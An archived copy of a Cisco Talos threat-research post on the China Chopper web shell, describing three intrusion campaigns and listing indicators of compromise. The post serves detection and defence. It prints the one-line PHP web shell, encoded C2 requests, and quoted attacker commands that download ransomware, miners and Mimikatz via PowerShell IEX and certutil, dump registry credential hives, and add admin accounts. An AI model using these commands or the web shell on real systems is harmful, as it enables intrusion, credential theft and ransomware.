{ "id": "b1e41f29-af9d-4c7a-b832-b9f66ea45283", "created_at": "2026-04-06T00:12:50.286803Z", "updated_at": "2026-04-10T13:11:39.425294Z", "deleted_at": null, "sha1_hash": "c417329a7eae9f54d26b9cafe4325ee95320f48b", "title": "China Chopper still active 9 years later", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 572928, "plain_text": "China Chopper still active 9 years later\r\nBy Vanja Svajcer\r\nPublished: 2019-08-27 · Archived: 2026-04-05 23:10:46 UTC\r\nBy Paul Rascagneres and Vanja Svajcer.\r\nIntroduction Threats will commonly fade away over time as they're discovered, reported on, and\r\ndetected. But China Chopper has found a way to stay relevant, active and effective nine years\r\nafter its initial discovery. China Chopper is a web shell that allows attackers to retain access to an\r\ninfected system using a client side application which contains all the logic required to control the\r\ntarget. Several threat groups have used China Chopper, and over the past two years, we've seen\r\nseveral different campaigns utilizing this web shell and we chose to document three most active\r\ncampaigns in this blog post.\r\nWe decided to take a closer look at China Chopper after security firm Cybereason reported on a massive attack\r\nagainst telecommunications providers called \"Operation Soft Cell,\" which reportedly utilized China Chopper.\r\nCisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017, which\r\nshows that even nine years after its creation, attackers are using China Chopper without significant modifications.\r\nThis web shell is widely available, so almost any threat actor can use. This also means it's nearly impossible to\r\nattribute attacks to a particular group using only presence of China Chopper as an indicator.\r\nThe usage of China Chopper in recent campaigns proves that a lot of old threats never really die, and defenders on\r\nthe internet need to be looking out for malware both young and old.\r\nWhat is China Chopper? China Chopper is a tool that allows attackers to remotely control the\r\ntarget system that needs to be running a web server application before it can be targeted by the\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 1 of 14\n\ntool. The web shell works on different platforms, but in this case, we focused only on\r\ncompromised Windows hosts. China Chopper is a tool that has been used by some state-sponsored\r\nactors such as Leviathan and Threat Group-3390, but during our investigation we've seen actors\r\nwith varying skill levels.\r\nIn our research, we discovered both Internet Information Services (IIS) and Apache web servers compromised\r\nwith China Chopper web shells. We do not have additional data about how the web shell was installed, but there\r\nare several web application frameworks such as older versions of Oracle WebLogic or WordPress that may have\r\nbeen targeted with known remote code execution or file inclusion exploits.\r\nChina Chopper provides the actor with a simple GUI that allows them to configure servers to connect to and\r\ngenerate server-side code that must be added to the targeted website code in order to communicate.\r\nChina Chopper GUI\r\nThe server-side code is extremely simple and contains, depending on the application platform, just a single line of\r\ncode. The backdoor supports .NET Active Server Pages or PHP.\r\nHere is an example of a server-side code for a compromised PHP application:\r\n\u003c?php @eval($_POST['test']);?\u003e\r\nWe cannot be sure if the simplicity of the server code was a deliberate decision on the part of the China Chopper\r\ndevelopers to make detection more difficult, but using pattern matching on such as short snippet may produce\r\nsome false positive detections.\r\nThe China Chopper client communicates with affected servers using HTTP POST requests. The only function of\r\nthe server-side code is to evaluate the request parameter specified during the configuration of the server code in\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 2 of 14\n\nthe client GUI. In our example, the expected parameter name is \"test.\" The communication over HTTP can be\r\neasily spotted in the network packet captures.\r\nChina Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of 'netstat\r\nan|find \"ESTABLISHED.\"' and it is very likely that this command will be seen in process creation logs on affected\r\nsystems.\r\nChina Chopper's first suggested Terminal command\r\nWhen we analyze the packet capture, we can see that the parameter \"test\" contains another eval statement.\r\nDepending on the command, the client will submit a certain number of parameters, z0 to zn. All parameters are\r\nencoded with a standard base64 encoder before submission. Parameter z0 always contains the code to parse other\r\nparameters, launch requested commands and return the results to the client.\r\ntest=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B\u0026z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRf\r\nEncoded China Chopper POST request with parameters\r\nIn this request, the decoded parameters are:\r\nz0 - @ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\"-\u003e|\");;$p=base64_deco\r\nret={$ret}\r\n\":\"\";;echo(\"|\u003c-\");die();\r\nz1 - cmd\r\nz2 - cd /d \"C:\\xampp\\htdocs\\dashboard\\\"\u0026netstat -an | find \"ESTABLISHED\"\u0026echo [S]\u0026cd\u0026echo [E]\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 3 of 14\n\nThe end of the command \"\u0026echo [S]\u0026cd\u0026echo [E]\" seems to be present in all virtual terminal requests and may\r\nbe used as a reliable indicator to detect China Chopper activity in packet captures or behavioral logs.\r\nApart from the terminal, China Chopper includes a file manager (with the ability to create directories, download\r\nfiles and change file metadata), a database manager and a rudimentary vulnerability scanner.\r\nWhat follows is our view into three different compromises, each with different goals, tools, techniques and likely\r\ndifferent actors.\r\nTimeline of the observed case studies\r\nCase study No. 1: Espionage context We identified the usage of China Chopper in a couple of\r\nespionage campaigns. Here, we investigate a campaign targeting an Asian government\r\norganization. In this campaign, China Chopper was used in the internal network, installed on a\r\nfew web servers used to store potentially confidential documents.\r\nThe purpose of the attacker was to obtain documents and database copies. The documents were automatically\r\ncompressed using WinRAR:\r\ncd /d C:\\Windows\\Working_Directory\\\r\nrenamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.x\r\nThis command is used to create an archive containing documents modified after the date put as an argument. The\r\narchives are protected with a strong password containing uppercase, lowercase and special characters. The\r\npasswords were longer than 15 characters.\r\nWe assume the attacker ran this command periodically in order to get only new documents and minimize the\r\nquantity of exfiltrated data.\r\nOn the same target, we identified additional commands executed with China Chopper using WinRAR:\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 4 of 14\n\nrar a -inul -ed -r -m3 -taDate -hp\u003cprofanity\u003e ~ID.tmp c:\\directory_to_scan\r\nChina Chopper is a public hacking tool and we cannot tell if in this case the attacker is the same actor as before.\r\nBut the rar command line here is sufficiently different to note that it could be a different actor. The actor used an\r\noffensive phrase for a password, which is why we've censored it here.\r\nThe attacker deployed additional tools to execute commands on the system:\r\nC:\\windows\\Microsoft.NET\\Framework\\v2.0.50727\\MSBuild.exe C:\\windows\\temp\\Document.csproj /p:AssemblyName=C:\\w\r\nMSBuild.exe is used to compile and execute a .NET application with two arguments: the ScriptFile argument\r\ncontains a PowerShell script encrypted with the value of the key argument. Here is the .NET code:\r\n.NET loader code\r\nThe .NET loader supports encrypted files or URLs as the script argument. If the operator uses an HTTP request,\r\nthe loader downloads the payload with one of the hardcoded User-Agents. The loader decrypts the downloaded\r\nfile and executes it:\r\nHardcoded User-Agent strings\r\nIn our case, the purpose of the decrypted payload was to perform a database dump:\r\npowershell.exe -exe bypass -nop -w hidden -c Import-Module C:\\windows\\help\\help\\helper.ps1;\r\nRun-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName;\r\nConvert Zero Datetime=True' -Query 'Select * from table where UID \u003e 'Value' -Dump\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 5 of 14\n\nThe \"where UID\" condition in the SQL query has the same purpose as the date in the previous WinRAR\r\ncommand. We assume the attacker performs the query periodically and does not want to dump the entire database,\r\nbut only the new entries. It is interesting to see that after dumping the data, the attacker checks if the generated file\r\nis available and if it contains any data:\r\ndir /O:D c:\\working_directory\\db.csv\r\npowershell -nop -exec bypass Get-Content \"c:\\working_directory\\db.csv\" | Select-Object -First 10\r\nHow are the file archives and the database dumps exfiltrated? Since the targeted server is in an internal network,\r\nthe attacker simply maps a local drive and copies the file to it.\r\ncd /d C:\\working_directory\\\r\nnet use \\192.168.0.10\\ipc$ /user:USER PASSWORD\r\nmove c:\\working_directory\\db.csv \\192.168.0.10\\destination_directory\r\nThe attacker must have access to the remote system in order to exfiltrate data. We already saw the usage of a\r\nHTTP tunnel tool to create a network tunnel between the infected system and a C2 server.\r\nCase No. 2: Multi-purpose campaign We observed another campaign targeting an organisation\r\nlocated in Lebanon. While our first case describes a targeted campaign with the goal to exfiltrate\r\ndata affecting internal servers, this one is the opposite: an auxiliary public web site compromised\r\nby several attackers for different purposes.\r\nWe identified actors trying to deploy ransomware on the vulnerable server using China Chopper. The first attempt\r\nwas Sodinokibi ransomware:\r\ncertutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\\Users\\UserA\\AppData\\Local\\Temp\\radm.exe\r\nThe second delivered the Gandcrab ransomware:\r\nIf($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){\r\nStart-Process -FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument \"IEX ((new-object\r\nInvoke-ACAXGZFTTDUDKY;\r\nStart-Sleep -s 1000000;\"\r\n} else {\r\nIEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));\r\nInvoke-ACAXGZFTTDUDKY;\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 6 of 14\n\nStart-Sleep -s 1000000;\r\n}\r\nHere is the script hosted on Pastebin:\r\nReflective loader downloaded from pastebin.com\r\nThe script executes a hardcoded PE file located — Gandcrab —at the end of the script using a reflective DLL-loading technique.\r\nIn addition to the ransomware, we identified another actor trying to execute a Monero miner on the vulnerable\r\nserver with China Chopper:\r\nPowershell -Command -windowstyle hidden -nop -enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155\r\nHere's a look at the miner configuration:\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 7 of 14\n\nMonero miner configuration\r\nSome of the detected activity may have been manual and performed in order to get OS credentials.\r\nTrying to get the registry:\r\nreg save hklm\\sam sam.hive\r\nreg save hklm\\system system.hive\r\nreg save hklm\\security security.hive\r\nUsing Mimikatz (with a few hiccups along the way):\r\npowershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/Powe\r\nInvoke-Mimikatz \u003e\u003ec:\\1.txt\r\npowershell IEX\",\"(New-Object\",\"Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCre\r\nC:\\Windows\\System32WindowsPowerShell\\v1.0\\powershell.exe IEX\r\n(New-Object\",\"Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master\r\nInvoke-Mimikatz\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe [Environment]::Is64BitProcess\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 8 of 14\n\npowershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/\r\nInvoke-Mimikatz \u003e\u003ec:\\1.txt\r\nAttempting to dump password hashes using a PowerShell module and the command line:\r\nIEX (New-Object\r\nNet.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1'\r\nThe attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory. In addition to\r\nthe multiple attempts to dump the credential, the attackers had to deal with typos: missed spaces, wrong\r\ncommands or letters switching.\r\nOne of the actors successfully acquired the credentials and tried to pivot internally by using the credentials and the\r\n\"net use\" commands.\r\nFinally, several remote access tools such as Gh0stRAT and Venom multi-hop proxy were deployed on the\r\nmachine, as well as a remote shell written purely in PowerShell.\r\nCase No. 3: Web hosting providers compromised In one campaign, we discovered an Asian web-hosting provider under attack, with the most significant compromise spanning several Windows\r\nservers over a period of 10 months. Once again, we cannot be sure if this was a single actor or\r\nmultiple groups, since the activities differ depending on the attacked server. We show just a subset\r\nof observed activities.\r\nServer 1 Generally, the attackers seek to create a new user and then add the user to the group of users with\r\nadministrative privileges, presumably to access and modify other web applications hosted on a single\r\nphysical server.\r\ncd /d C:\\compromisedappdirectory\u0026net user user pass /add\r\ncd /d C:\\compromisedappdirectory\u0026net localgroup administrattors user /add\r\nNotice the misspelling of the word \"administrators.\" The actor realizes that the addition of the user was not\r\nsuccessful and attempts a different technique. They download and install an archive containing executables and\r\ntrivially modified source code of the password-stealing tool \"Mimikatz Lite\" as GetPassword.exe.\r\nThe tool investigates the Local Security Authority Subsystem memory space in order to find, decrypt and display\r\nretrieved passwords. The only change, compared with the original tool is that actors change the color and the code\r\npage of the command window. The color is changed so that green text is displayed on a black background and the\r\nactive console code page is changed to the Chinese code page 936.\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 9 of 14\n\nFinally, the actor attempts to dump the database of a popular mobile game \"Clash of Kings,\" possibly hosted on a\r\nprivate server.\r\nServer 2 An actor successfully tested China Chopper on a second server and stopped the activity. However,\r\nwe also found another Monero cryptocurrency miner just as we found commodity malware on other\r\nsystems compromised with China Chopper.\r\nThe actors first reset the Access Control List for the Windows temporary files folder and take ownership of the\r\nfolder. They then allow the miner executable through the Windows Firewall and finally launch the mining\r\npayload.\r\nC:\\Windows\\system32\\icacls.exe C:\\Windows\\Temp /Reset /T\r\nC:\\Windows\\system32\\takeown.exe /F C:\\Windows\\Temp\r\nC:\\Windows\\system32\\netsh.exe Firewall Add AllowedProgram C:\\Windows\\Temp\\lsass.eXe Windows Update Enable\r\nC:\\Windows\\Temp\\lsass.eXe\r\nServer 3 The attack on this server starts by downloading a number of public and private tools, though we\r\nwere not able to retrieve them.\r\nThe actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it\r\nimproperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit.\r\ncd /d C:\\directoryofcompromisedapp\u0026rundll32 C:\\directoryofcompromisedapp\\ALPC-TaskSched-LPE.dll,a\r\nThe attacker launches several custom tools and an available tool that attempts to create a new user iis_uses and\r\nchange DACLs to allow the users to modify certain operating system objects.\r\nThe attacker obtains the required privileges and launches a few other tools to modify the access control lists\r\n(ACLs) of all websites running on the affected server. This is likely done to compromise other sites or to run a\r\nweb defacement campaign.\r\ncacls \\. C:\\path_to_a_website /T /E /C /G Everyone:F\r\nFinally, the actor attempts to launch Powershell Mimikatz loader to get more credentials from memory and save\r\nthe credentials into a text file:\r\npowershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.co\r\n-Encoding ASCII outputfile.txt\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 10 of 14\n\nServer 4 The China Chopper actor activity starts with the download and execution of two exploit files\r\nwhich attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099\r\nto allow the attacker to modify other objects on the server.\r\nOnce the privilege escalation was successful, the actor adds a new user account and adds the account to the\r\nadministrative group.\r\nnet user admin admin /ad\r\nnet localgroup administrators admin /ad\r\nThe attacker next logs on to the server with a newly created user account and launches a free tool\r\nreplacestudio32.exe, a GUI utility that easily searches through text-based files and performs replacement with\r\nanother string. Once again, this could be used to affect all sites hosted on the server or simply deface pages.\r\nConclusion Insecure web applications provide an effective entry point for attackers and allow\r\nthem to install additional tools such as web shells, conduct reconnaissance and pivot to other\r\nsystems.\r\nAlthough China Chopper is an old tool, we still see it being used by attackers with various goals and skill levels\r\nand in this post we showed some of the common tools, techniques and processes employed in three separate\r\nbreaches. Because it is so easy to use, it's impossible to confidently connect it to any particular actor or group.\r\nIn our research we documented three separate campaigns active over a period of several months. This corroborates\r\nthe claim that an average time to detect an intrusion is over 180 days and implies that defenders should approach\r\nbuilding their security teams and processes around an assumption that the organization has already been breached.\r\nIt is crucial that an incident response team should have a permission to proactively hunt for breaches, not only to\r\nrespond to alerts raised by automated detection systems or escalated by the first line security analysts.\r\nWhen securing the infrastructure it is important to keep internal as well as external facing web servers,\r\napplications, and frameworks up to date with the latest security patches to mitigate risk of compromise with\r\nalready known exploits.\r\nDespite the age, China Chopper is here to stay, and we will likely see it in the wild going forward.\r\nCoverage Intrusion prevention systems such as SNORT® provide an effective tool\r\nto detect China Chopper activity due to specific signatures present at the end of\r\neach command. In addition to intrusion prevention systems, it is advisable to\r\nemploy endpoint detection and response tools (EDR) such as Cisco AMP for\r\nEndpoints, which gives users the ability to track process invocation and inspect\r\nprocesses. Try AMP for free here.\r\nAdditional ways our customers can detect and block these threats are listed below.\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 11 of 14\n\nCisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nChina Chopper clients 9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a\r\nc5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef\r\nb84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07\r\n58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc\r\nCase study 1\r\nFiles b1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 - downloader\r\nfe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 - proxy\r\n28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 - downloader dll\r\nc9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e - nbtscan tool\r\ndbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c - Miner\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 12 of 14\n\nLegitimate tools d76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 - rar\r\n46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd - renamed rar\r\n96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 - renamed rar\r\nIP addresses 69.165.64.100\r\n59.188.255.184\r\n154.211.12.153\r\n185.234.218.248\r\nCase study 2\r\nFiles 02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 - Gandcrab loader\r\n1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 - Gandcrab\r\n219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 - Miner/dropper\r\n4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 - massscan dropped by the\r\nminer\r\na06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb - remote exploit\r\n919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a - multihop Venom proxy\r\nURLs hxxp://101.78.142.74:8001/xavg/javae[.]exe\r\nhxxp://107.181.160.197/win/3p/checking[.]ps1\r\nhxxp://107.182.28.64/t0[.]txt\r\nhxxp://139.180.199.167:1012/update[.]ps1\r\nhxxp://172.96.241.10:80/a\r\nhxxp://185.228.83.51/config[.]c\r\nhxxp://188.166.74.218/radm[.]exe\r\nhxxp://188.166.74.218/untitled[.]exe\r\nhxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1\r\nhxxp://202.144.193.177/1[.]ps1\r\nhxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1\r\nhxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1\r\nhxxp://is.gd/oeoFuI\r\nhxxps://pastebin.com/raw/Hd7BmJ33\r\nhxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1\r\nhxxp://fid.hognoob.se/download[.]exe\r\nhxxp://107.182.28.64/t0[.]txt\r\nhxxp://uio.hognoob.se:63145/cfg[.]ini\r\nhxxp://fid.hognoob.se/HidregSvc[.]exe\r\nhxxp://188.166.74.218/untitled[.]exe\r\nhxxp://45.55.211.79/.cache/untitled[.]exe\r\nhxxp://188.166.74.218/untitled[.]exe\r\nIP Addresses 185.234.218.248\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 13 of 14\n\nCase study 3\r\nFiles: fe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 - Mini Mimikatz archive\r\n2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 - CVE-2015-0062\r\nf3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 - CVE-2015-1701/CVE-2016-\r\n0099\r\nb46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab - a tool for adding and elevating\r\na user\r\nab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f - ACLs editing for defaced sites\r\nLegitimate Tools: ee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 - Replace\r\nStudio\r\nd1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 - part of Replace Studio\r\nSource: https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nhttps://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html" ], "report_names": [ "china-chopper-still-active-9-years-later.html" ], "threat_actors": [ { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "83025f5e-302e-46b0-baf6-650a4d313dfc", "created_at": "2024-05-01T02:03:07.971863Z", "updated_at": "2026-04-10T02:00:03.743131Z", "deleted_at": null, "main_name": "BRONZE MOHAWK", "aliases": [ "APT40 ", "GADOLINIUM ", "Gingham Typhoon ", "Kryptonite Panda ", "Leviathan ", "Nanhaishu ", "Pickleworm ", "Red Ladon ", "TA423 ", "Temp.Jumper ", "Temp.Periscope " ], "source_name": "Secureworks:BRONZE MOHAWK", "tools": [ "AIRBREAK", "BlackCoffee", "China Chopper", "Cobalt Strike", "DadJoke", "Donut", "FUSIONBLAZE", "GreenCrash", "Meterpreter", "Nanhaishu", "Orz", "SeDll" ], "source_id": "Secureworks", "reports": null }, { "id": "04b07437-41bb-4126-bcbb-def16f19d7c6", "created_at": "2022-10-25T16:07:24.232628Z", "updated_at": "2026-04-10T02:00:04.906097Z", "deleted_at": null, "main_name": "Stone Panda", "aliases": [ "APT 10", "ATK 41", "Bronze Riverside", "CTG-5938", "CVNX", "Cuckoo Spear", "Earth Kasha", "G0045", "G0093", "Granite Taurus", "Happyyongzi", "Hogfish", "ITG01", "Operation A41APT", "Operation Cache Panda", "Operation ChessMaster", "Operation Cloud Hopper", "Operation Cuckoo Spear", "Operation New Battle", "Operation Soft Cell", "Operation TradeSecret", "Potassium", "Purple Typhoon", "Red Apollo", "Stone Panda", "TA429", "menuPass", "menuPass Team" ], "source_name": "ETDA:Stone Panda", "tools": [ "Agent.dhwf", "Agentemis", "Anel", "AngryRebel", "BKDR_EVILOGE", "BKDR_HGDER", "BKDR_NVICM", "BUGJUICE", "CHINACHOPPER", "ChChes", "China Chopper", "Chymine", "CinaRAT", "Cobalt Strike", "CobaltStrike", "DARKTOWN", "DESLoader", "DILLJUICE", "DILLWEED", "Darkmoon", "DelfsCake", "Derusbi", "Destroy RAT", "DestroyRAT", "Ecipekac", "Emdivi", "EvilGrab", "EvilGrab RAT", "FYAnti", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "GreetCake", "HAYMAKER", "HEAVYHAND", "HEAVYPOT", "HTran", "HUC Packet Transmit Tool", "Ham Backdoor", "HiddenFace", "Impacket", "Invoke the Hash", "KABOB", "Kaba", "Korplug", "LODEINFO", "LOLBAS", "LOLBins", "Living off the Land", "MiS-Type", "Mimikatz", "Moudour", "Mydoor", "NBTscan", "NOOPDOOR", "Newsripper", "P8RAT", "PCRat", "PlugX", "Poison Ivy", "Poldat", "PowerSploit", "PowerView", "PsExec", "PsList", "Quarks PwDump", "Quasar RAT", "QuasarRAT", "RedDelta", "RedLeaves", "Rubeus", "SNUGRIDE", "SPIVY", "SharpSploit", "SigLoader", "SinoChopper", "SodaMaster", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trochilus RAT", "UpperCut", "Vidgrab", "WinRAR", "WmiExec", "Wmonder", "Xamtrav", "Yggdrasil", "Zlib", "certutil", "certutil.exe", "cobeacon", "dfls", "lena", "nbtscan", "pivy", "poisonivy", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "3b8b4ed7-e8cc-4a3a-b14d-c8ebf87c0f9c", "created_at": "2023-01-06T13:46:39.062729Z", "updated_at": "2026-04-10T02:00:03.200784Z", "deleted_at": null, "main_name": "Operation Soft Cell", "aliases": [], "source_name": "MISPGALAXY:Operation Soft Cell", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a", "created_at": "2022-10-25T15:50:23.481057Z", "updated_at": "2026-04-10T02:00:05.306469Z", "deleted_at": null, "main_name": "Leviathan", "aliases": [ "MUDCARP", "Kryptonite Panda", "Gadolinium", "BRONZE MOHAWK", "TEMP.Jumper", "APT40", "TEMP.Periscope", "Gingham Typhoon" ], "source_name": "MITRE:Leviathan", "tools": [ "Windows Credential Editor", "BITSAdmin", "HOMEFRY", "Derusbi", "at", "BLACKCOFFEE", "BADFLICK", "gh0st RAT", "PowerSploit", "MURKYTOP", "NanHaiShu", "Orz", "Cobalt Strike", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "b9806584-4d82-4f32-ae97-18a2583e8d11", "created_at": "2022-10-25T16:07:23.787833Z", "updated_at": "2026-04-10T02:00:04.749709Z", "deleted_at": null, "main_name": "Leviathan", "aliases": [ "APT 40", "ATK 29", "Bronze Mohawk", "G0065", "Gadolinium", "Gingham Typhoon", "ISLANDDREAMS", "ITG09", "Jumper Taurus", "Kryptonite Panda", "Mudcarp", "Red Ladon", "TA423", "TEMP.Jumper", "TEMP.Periscope" ], "source_name": "ETDA:Leviathan", "tools": [ "AIRBREAK", "Agent.dhwf", "Agentemis", "AngryRebel", "BADFLICK", "BlackCoffee", "CHINACHOPPER", "China Chopper", "Cobalt Strike", "CobaltStrike", "DADJOKE", "Dadstache", "Derusbi", "Destroy RAT", "DestroyRAT", "Farfli", "GRILLMARK", "Gh0st RAT", "Ghost RAT", "HOMEFRY", "Hellsing Backdoor", "Kaba", "Korplug", "LOLBAS", "LOLBins", "LUNCHMONEY", "Living off the Land", "MURKYTOP", "Moudour", "Mydoor", "NanHaiShu", "Orz", "PCRat", "PNGRAT", "PlugX", "RedDelta", "SeDLL", "Sensocode", "SinoChopper", "Sogu", "TIGERPLUG", "TVT", "Thoper", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "ZoxPNG", "cobeacon", "gresim", "scanbox" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434370, "ts_updated_at": 1775826699, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c417329a7eae9f54d26b9cafe4325ee95320f48b.pdf", "text": "https://archive.orkl.eu/c417329a7eae9f54d26b9cafe4325ee95320f48b.txt", "img": "https://archive.orkl.eu/c417329a7eae9f54d26b9cafe4325ee95320f48b.jpg" } }